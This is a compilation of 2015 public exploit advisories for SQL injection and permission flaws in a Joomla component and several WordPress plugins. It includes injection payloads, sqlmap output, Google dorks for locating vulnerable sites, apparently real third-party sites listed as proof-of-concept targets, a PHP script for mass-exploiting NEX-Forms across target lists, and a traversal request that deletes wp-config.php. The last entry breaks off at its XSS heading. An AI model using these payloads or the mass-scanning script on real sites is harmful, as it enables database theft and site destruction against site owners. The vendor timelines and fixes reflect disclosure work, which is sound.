[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'

######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax functions wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
    try {
  global $wpdb;
  $json    = array();
  $post    = stripslashes_deep($_POST);
  $tblName  = $wpdb->prefix . 'duplicator_packages';
  $postIDs  = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
  $list    = explode(",", $postIDs);
  $delCount  = 0;
 
        if ($postIDs != null) {
 
            foreach ($list as $id) {
      $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
      if ($getResult) {
        $row    =  $getResult[0];
        $nameHash  = "{$row['name']}_{$row['hash']}";
        $delResult  = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
        if ($delResult != 0) {
 
 
 $post['duplicator_delid'] variable is not sanitized
 
 A authorized user with "export" permission or a remote unauthenticated attacker could
 use this vulnerability to execute arbitrary SQL queries on the victim
 WordPress web site by enticing an authenticated admin (CSRF)
 
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
 
 POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-08:  Discovered vulnerability
2015-04-08:  Vendor Notification
2015-04-09:  Vendor Response/Feedback 
2015-04-10:  Vendor Send Fix/Patch
2015-04-10:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

######################
 
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense' ,'google_adsense');
 add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
 function google_adsense(){
     global $wpdb;
     $vid = $_GET['vid'];  
     $google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
     $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
     $google_adsense = unserialize($query);
     echo $google_adsense['googleadsense_code']; 
     die();
 
 $vid = $_GET['vid']; is not sanitized
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-04:  Discovered vulnerability
2015-04-06:  Vendor Notification
2015-04-06:  Vendor Response/Feedback 
2015-04-07:  Vendor Send Fix/Patch (same version number)
2015-04-13:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

######################
 
# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
 
 
# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip
 
# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder
 
# Date : 2015-03-29
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# Info:
 
 The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
 
 "nex_forms_Id" var is not sanitized
 
# PoC Exploit:
 
 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
# Poc Video:
 
 http://youtu.be/04G08Cbrx1I
 
# PoC sqlmap:
 
 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Exploit name:  MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability
  # Type:          SQL Injection
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
 
 
# VENTOR
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
 
# Vulnerability Description
The "submit_nex_form" ajax function is affected from SQL Injection
vulnerability
 
# Tool Description
Automation script explores targets with the help of SqlMap tool Execute
command SqlMap
 
{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
  --technique=B -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent
  --answers='follow=N' --dbs --batch --time-sec 10 --level 2  --risk 1
 
# GET VULN
SQL can be injected in the following GET
 
GET VULN:     nex_forms_Id=(id)
$nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
Ex:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1
 
# XPL inject DBMS: 'MySQL'
 
Exploit:  AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
- GOOGLE DORK
 
inurl:nex-forms-express-wp-form-builder
index of nex-forms-express-wp-form-builde
# COMMAND --help:
 
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
                  php wp3xplo1t.php -t target
                  php wp3xplo1t.php -f targets.txt
                  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
# EXPLOIT MASS USE SCANNER INURLBR
 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s
wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
# DOWNLOAD INURLBR
 
https://github.com/googleinurl/SCANNER-INURLBR
 
# REFERENCE
[1] http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
 
EXPLOIT CODE:
 
<?php
 
/*
  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
 
-----------------------------------------------------------------------------
 
  # AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
 
  # Who Discovered
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
  # Vulnerability discovered by: Claudio Viviani
 
-----------------------------------------------------------------------------
 
  # EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL
  # VENTOR:
https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
  # Dork Google:  inurl:nex-forms-express-wp-form-builder
  # Dork Google:  index of nex-forms-express-wp-form-builde
  # GET VULN:     nex_forms_Id=(id)
  # $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
 
-----------------------------------------------------------------------------
 
  # DBMS: 'MySQL'
  # Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
 
 
-----------------------------------------------------------------------------
 
  # Info:         The "submit_nex_form" ajax function is affected from SQL
Injection vulnerability
  # POC:
http://target.us/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
 
-----------------------------------------------------------------------------
 
  # --help:
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
 
-----------------------------------------------------------------------------
 
  # EXPLOIT MASS USE SCANNER INURLBR
  # COMMAND: ./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder'
-s wp3xplo1t.txt -q 1,6 --comand-vul "php wp3xplo1t.php -t '_TARGET_'"
  # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
 
-----------------------------------------------------------------------------
  INFO:
http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/
 */
 
 
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
$folder_SqlMap = "sqlmap"; // set the folder! ex: python
../../sqlmap/sqlmap.py
$op_ = getopt('f:t:p:', array('help::'));
echo "
\t\t\t\t  _____
\t\t\t\t (_____)    ____ _   _ _    _ _____  _                 ____
       _ _
\t\t\t\t (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \
       (_) |
\t\t\t\t  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __
__ _ ___ _| |
\t\t\t\t   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/
_` / __| | |
\t\t\t\t   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | |
(_| \__ \ | |
\t\t\t\t  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|
 \__,_|___/_|_|
\t\t\t\t\033[1;37m0xNeither war between hackers, nor peace for the system.\n
\t\t\t\t[+] [Exploit]: MINI 3xplo1t-SqlMap - WordPress NEX-Forms 3.0 SQL
Injection Vulnerability / INURL BRASIL\n\t\t\t\t[+] [help]:
 --help\033[0m\n\n";
$menu = "
\t\t\t\t    -t : SET TARGET.
\t\t\t\t    -f : SET FILE TARGETS.
\t\t\t\t    -p : SET PROXY
\t\t\t\t    Execute:
\t\t\t\t                  php wp3xplo1t.php -t target
\t\t\t\t                  php wp3xplo1t.php -f targets.txt
\t\t\t\t                  php wp3xplo1t.php -t target -p '
http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
 
$params = array(
    'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ?
$op_['t'] : "http://{$op_['t']}") : NULL,
    'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ?
$op_['f'] : NULL,
    'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
    'folder' => $folder_SqlMap,
    'line' =>
"\t\t\t\t--------------------------------------------------------------------------------------------------------"
);
 
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ?
exit("\t\t\t\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
 
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
 
function __plus() {
    ob_flush();
    flush();
}
 
function __listTarget($file) {
    $tgt_ = array_unique(array_filter(explode("\n",
file_get_contents($file['file']))));
    echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS
LOADED : " . count($tgt_) . "\033[0m\n";
    foreach ($tgt_ as $url) {
        echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :
{$url} \033[0m\n";
        __plus();
        $file['target'] = $url;
        __exec($file) . __plus();
    }
}
 
function __exec($params) {
    __plus();
    echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]
starting SqlMap...\n";
    echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:
{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id={SQL-INJECTION}\033[0m\n";
    $command = "{$params['folder']} -u
'{$params['target']}/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1'
"
            . " -p nex_forms_Id --dbms mysql {$params['proxy']}
--random-agent "
            . " --answers='follow=N' --dbs --batch --time-sec 10 --level 2
 --risk 1";
    system($command, $dados);
    __plus();
    exit(0);
}

------------------------
ISSUE 1:
 
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
 
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
 
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/shortcode.php, lines 27 and 120:
 
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
 
 
3. Proof of concept
---------------------------
 
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
 
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
 
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
 
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
 
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
 
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
 
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
 
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
 
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
 
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
 
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
 
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
 
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
 
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
 
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
 
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
 
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
 
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
 
 
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
 
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
 
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
 
open
------WebKitFormBoundary384PE6lRgBcOibkL--
 
 
5. Solution
---------------
 
Update to version 1.6
 
 
------------------------
ISSUE 2:
 
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary
------------------
 
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
 
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
 
2. Vulnerability timeline
----------------------------------
 
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
 
- 05/05/2015: Response from the developer.
        - 06/05/2015: Fixed version in 1.6
 
3. Vulnerable code
---------------------------
 
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
 
[...]
Line 28:  add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29:  add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
[...]
 
3. Proof of concept
---------------------------
 
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
 
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
 
4. Explanation
---------------------
 
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
ar
to:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
 
The second time he tries to do the same with the same email the message
returned will be:
 
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
 
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
me
message  indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
 
5. Solution
---------------
 
Update to version 1.6

--------
ISSUE 1:
 
# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
    Ultimate Product Catalogue is a responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
    Unauthenticated SQL injection in ajax call when the plugin is counting
the times a product is being seen by the web visitors. The vulnerable POST
parameter is "Item_ID".
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    In file Functions/Process_Ajax.php line 67:
 [...]
$Item_ID = $_POST['Item_ID'];
        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
WHERE Item_ID=" . $Item_ID);
[...]
 
3. Proof of concept:
 
    POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: <wordpress host>
  [...]
  Cookie: wordpress_f305[...]
 
  Item_ID=2 AND SLEEP(5)&action=record_view
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45
 
 
 
--------
ISSUE 2:
 
 
# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
     Ultimate Product Catalogue is A responsive and easily customizable
plugin for all your product catalogue needs. It has +62.000 downloads,
+4.000 active installations.
 
 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor explores a product published by the web administrator
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
3. Vulnerable code:
 
    File Functions/Shortcodes.php line 779
 
3. Proof of concept
 
    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
 
4. Solution:
 
    Update to version 3.1.3
 
-- 
Felipe Molina de la Torre
 
PGP Key ID: BB7CFB45

Description
 
"media-file-manager-advanced" suffers from executing administrator actions by any authenticated user due to weak permissions checking.
An attacker can delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-SiteScripting.
 
Homepage
 
https://wordpress.org/plugins/media-file-manager-advanced/
 
Affected Version
 
<= 1.1.5
 
Description
 
Vulnerability Scope
 
LFD,SQL,XSS,Site Ruining and Changing of Content.
 
Authorization Required
 
User
 
Proof of Concept
 
 
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
post: id=17
 
MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER
 
folder exists: http://domain.tld/wp-contents/uploads/EVEXFOLDER
 
RMDIR (Dir Must Be Empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=
 
not found: http://domain.tld/wp-contents/uploads/EVEXFOLDER
 
UNLINK
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php
 
no more wp-config.php
 
Blind SQL INJECTION
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)
 
Sleeps for 10 seconds
 
XSS
